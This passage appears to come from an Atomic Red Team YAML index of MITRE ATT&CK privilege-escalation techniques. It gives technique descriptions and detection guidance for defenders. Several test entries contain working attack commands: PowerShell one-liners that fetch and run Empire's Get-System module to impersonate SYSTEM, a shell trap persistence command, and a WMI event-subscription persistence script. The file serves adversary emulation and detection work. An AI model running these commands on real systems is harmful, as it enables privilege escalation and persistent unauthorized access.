Windows API calls such as OpenThread. 
At this point the process - can be suspended then written to, realigned to the injected code, and resumed - via SuspendThread , VirtualAllocEx, WriteProcessMemory, - SetThreadContext, then ResumeThread respectively.(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) - but targets an existing process rather than creating a process in a suspended - state. \n\nRunning code in the context of another process may allow access - to the process's memory, system/network resources, and possibly elevated privileges. - Execution via Thread Execution Hijacking may also evade detection from security - products since the execution is masked under a legitimate process. " - id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:21:29.233Z' - created: '2020-01-14T01:28:32.166Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. 
Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - and those that can be used to modify memory within another process, such as - VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1055.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.005 - url: https://attack.mitre.org/techniques/T1055/005 - - url: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html - description: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif - Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. - Retrieved December 18, 2017. - source_name: FireEye TLS Nov 2017 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Thread Local Storage - description: "Adversaries may inject malicious code into processes via thread - local storage (TLS) callbacks in order to evade process-based defenses as - well as possibly elevate privileges. TLS callback injection is a method of - executing arbitrary code in the address space of a separate live process. 
- \n\nTLS callback injection involves manipulating pointers inside a portable - executable (PE) to redirect a process to malicious code before reaching the - code's legitimate entry point. TLS callbacks are normally used by the OS to - setup and/or cleanup data used by threads. Manipulating TLS callbacks may - be performed by allocating and writing to specific offsets within a process’ - memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) - techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: - FireEye TLS Nov 2017)\n\nRunning code in the context of another process may - allow access to the process's memory, system/network resources, and possibly - elevated privileges. Execution via TLS callback injection may also evade detection - from security products since the execution is masked under a legitimate process. " - id: attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:23:30.093Z' - created: '2020-01-14T01:30:41.092Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. 
Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - and those that can be used to modify memory within another process, such as - VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1547.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.003 - url: https://attack.mitre.org/techniques/T1547/003 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top - description: Microsoft. (2018, February 1). Windows Time Service (W32Time). - Retrieved March 26, 2018. - source_name: Microsoft W32Time Feb 2018 - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://github.com/scottlundgren/w32time - description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, - 2018. - source_name: Github W32Time Oct 2017 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings - description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. - Retrieved March 26, 2018. - source_name: Microsoft W32Time May 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. 
- source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Time Providers - description: |- - Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) - - Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) - - Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. 
(Citation: Github W32Time Oct 2017) - id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:24:26.476Z' - created: '2020-01-24T15:51:52.317Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: |- - Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) - - The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) - x_mitre_data_sources: - - API monitoring - - Binary file metadata - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_contributors: - - Scott Lundgren, @5twenty9, Carbon Black - x_mitre_platforms: - - Windows - atomic_tests: [] - T1134.001: - technique: - created: '2020-02-18T16:39:06.289Z' - modified: '2020-03-26T21:29:18.608Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d - description: |- - Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). 
The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. - - An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system. - name: Token Impersonation/Theft - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1134.001 - url: https://attack.mitre.org/techniques/T1134/001 - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring - x_mitre_detection: |- - If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) - - Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. 
- x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1134.001 - atomic_tests: - - name: Named pipe client impersonation - auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 - description: |- - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. - When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). - - Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ - supported_platforms: - - windows - executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique NamedPipe -Verbose - name: powershell - elevation_required: true - - name: "`SeDebugPrivilege` token duplication" - auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 - description: |- - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. - When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). 
- supported_platforms: - - windows - executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique Token -Verbose - name: powershell - elevation_required: true - T1546.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.005 - url: https://attack.mitre.org/techniques/T1546/005 - - source_name: Trap Manual - url: https://ss64.com/bash/trap.html - description: ss64. (n.d.). trap. Retrieved May 21, 2019. - - source_name: Cyberciti Trap Statements - url: https://bash.cyberciti.biz/guide/Trap_statement - description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, - 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Trap - description: |- - Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. - - Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. 
Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) - id: attack-pattern--63220765-d418-44de-8fae-694b3912317d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:43:02.273Z' - created: '2020-01-24T14:17:43.906Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Trap commands must be registered for the shell or programs, - so they appear in files. Monitoring files for suspicious or overly broad trap - commands can narrow down suspicious behavior during an investigation. Monitor - for suspicious processes executed through trap interrupts. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - - Linux - identifier: T1546.005 - atomic_tests: - - name: Trap - auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - description: | - After exiting the shell, the script will download and execute. - After sending a keyboard interrupt (CTRL+C) the script will download and execute. - supported_platforms: - - macos - - linux - executor: - command: | - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT - exit - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt - name: sh - T1055.014: - technique: - id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5 - description: "Adversaries may inject malicious code into processes via VDSO - hijacking in order to evade process-based defenses as well as possibly elevate - privileges. Virtual dynamic shared object (vdso) hijacking is a method of - executing arbitrary code in the address space of a separate live process. 
- \n\nVDSO hijacking involves redirecting calls to dynamically linked shared - libraries. Memory protections may prevent writing executable code to a process - via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). - However, an adversary may hijack the syscall interface code stubs mapped into - a process from the vdso shared object to execute syscalls to open and map - a malicious shared object. This code can then be invoked by redirecting the - execution flow of the process via patched memory address references stored - in a process' global offset table (which store absolute addresses of mapped - library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace - VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in - the context of another process may allow access to the process's memory, system/network - resources, and possibly elevated privileges. Execution via VDSO hijacking - may also evade detection from security products since the execution is masked - under a legitimate process. " - name: VDSO Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1055.014 - url: https://attack.mitre.org/techniques/T1055/014 - - source_name: ELF Injection May 2009 - url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html - description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via - GOT poisoning. Retrieved March 15, 2020. - - source_name: Backtrace VDSO - url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ - description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. - Retrieved June 15, 2020. - - source_name: VDSO Aug 2005 - url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ - description: Petersson, J. 
(2005, August 14). What is linux-gate.so.1?. Retrieved - June 16, 2020. - - source_name: Syscall 2014 - url: https://lwn.net/Articles/604515/ - description: Drysdale, D. (2014, July 16). Anatomy of a system call, part - 2. Retrieved June 16, 2020. - - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: - Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved - December 20, 2017.' - source_name: ArtOfMemoryForensics - - url: https://www.gnu.org/software/acct/ - description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved - December 20, 2017. - source_name: GNU Acct - - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - - Chapter 7 - System Auditing. Retrieved December 20, 2017. - source_name: RHEL auditd - - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html - description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. - Retrieved December 20, 2017. - source_name: Chokepoint preload rootkits - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:45.232Z' - created: '2020-01-14T01:35:00.781Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace - and mmap, that can be used to attach to, manipulate memory, then redirect - a processes' execution path. 
Monitoring for Linux specific calls such as the - ptrace system call should not generate large amounts of data due to their - specialized nature, and can be a very effective method to detect some of the - common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: - GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) - \n\nAnalyze process behavior to determine if a process is performing actions - it usually does not, such as opening network connections, reading files, or - other suspicious actions that could relate to post-compromise behavior. " - x_mitre_data_sources: - - System calls - - Process monitoring - x_mitre_platforms: - - Linux - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1078: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078 - url: https://attack.mitre.org/techniques/T1078 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. - source_name: TechNet Audit Policy - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. 
Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) - name: Valid Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' - created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian - x_mitre_is_subtechnique: false - atomic_tests: [] - T1546.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.003 - url: https://attack.mitre.org/techniques/T1546/003 - - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the - Front Lines. Retrieved May 18, 2016.' - source_name: Mandiant M-Trends 2015 - - source_name: FireEye WMI SANS 2015 - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf - description: Devon Kerr. (2015). There's Something About WMI. Retrieved May - 4, 2020. - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. 
- source_name: FireEye WMI 2015 - - url: https://www.secureworks.com/blog/wmi-persistence - description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, - March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. - source_name: Dell WMI Persistence - - source_name: Microsoft MOF May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- - description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved - January 24, 2020. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s - WMI Persistence. Retrieved October 11, 2019. - url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - source_name: Medium Detecting WMI Persistence - - source_name: Microsoft Register-WmiEvent - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 - description: Microsoft. (n.d.). Retrieved January 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Windows Management Instrumentation Event Subscription - description: |- - Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. 
(Citation: Mandiant M-Trends 2015) - - Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) - - WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. - id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-05T12:02:45.522Z' - created: '2020-01-24T14:07:56.276Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) - - Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). 
- x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - WMI Objects - x_mitre_platforms: - - Windows - identifier: T1546.003 - atomic_tests: - - name: Persistence via WMI Event Subscription - auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - description: | - Run from an administrator powershell window. After running, reboot the victim machine. - After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. - - Code references - - https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af - - https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - supported_platforms: - - windows - executor: - command: | - $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - EventNameSpace='root\CimV2'; - QueryLanguage="WQL"; - Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; - $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - - $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} - $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs - - $FilterToConsumerArgs = @{ - Filter = [Ref] $Filter; - Consumer = [Ref] $Consumer; - } - $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs - cleanup_command: | - $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - 
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject - $EventConsumerToCleanup | Remove-WmiObject - $EventFilterToCleanup | Remove-WmiObject - name: powershell - elevation_required: true - T1543.003: - technique: - id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 - description: "Adversaries may create or modify Windows services to repeatedly - execute malicious payloads as part of persistence. When Windows boots up, - it starts programs or applications called services that perform background - system functions.(Citation: TechNet Services) Windows service configuration - information, including the file path to the service's executable or recovery - programs/commands, is stored in the Windows Registry. Service configurations - can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). - \n\nAdversaries may install a new service or modify an existing service by - using system utilities to interact with services, by directly modifying the - Registry, or by using custom tools to interact with the Windows API. Adversaries - may configure services to execute at startup in order to persist on a system.\n\nAn - adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) - by using a service name from a related operating system or benign software, - or by modifying existing services to make detection analysis more challenging. - Modifying existing services may interrupt their functionality or may enable - services that are disabled or otherwise not commonly used. \n\nServices may - be created with administrator privileges but are executed under SYSTEM privileges, - so an adversary may also use a service to escalate privileges from administrator - to SYSTEM. 
Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). " - name: Windows Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.003 - url: https://attack.mitre.org/techniques/T1543/003 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 - description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service - was installed in the system. Retrieved August 7, 2018.' - source_name: Microsoft 4697 APR 2017 - - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection - description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding - to help with intrusion detection. Retrieved August 7, 2018. 
- source_name: Microsoft Windows Event Forwarding FEB 2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:49:58.490Z' - created: '2020-01-17T19:13:50.402Z' - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - x_mitre_detection: "Monitor processes and command-line arguments for actions - that could create or modify services. Command-line invocation of tools capable - of adding or modifying services may be unusual, depending on how systems are - typically used in a particular environment. Services may also be modified - through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional - logging may need to be configured to gather the appropriate data. Remote access - tools with built-in features may also interact directly with the Windows API - to perform these functions outside of typical system utilities. Collect service - utility execution and service binary path arguments used for analysis. Service - binary paths may even be changed to execute commands or scripts. \n\nLook - for changes to service Registry entries that do not correlate with known software, - patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. - Changes to the binary path and the service startup type changed from manual - or disabled to automatic, if it does not typically do so, may be suspicious. 
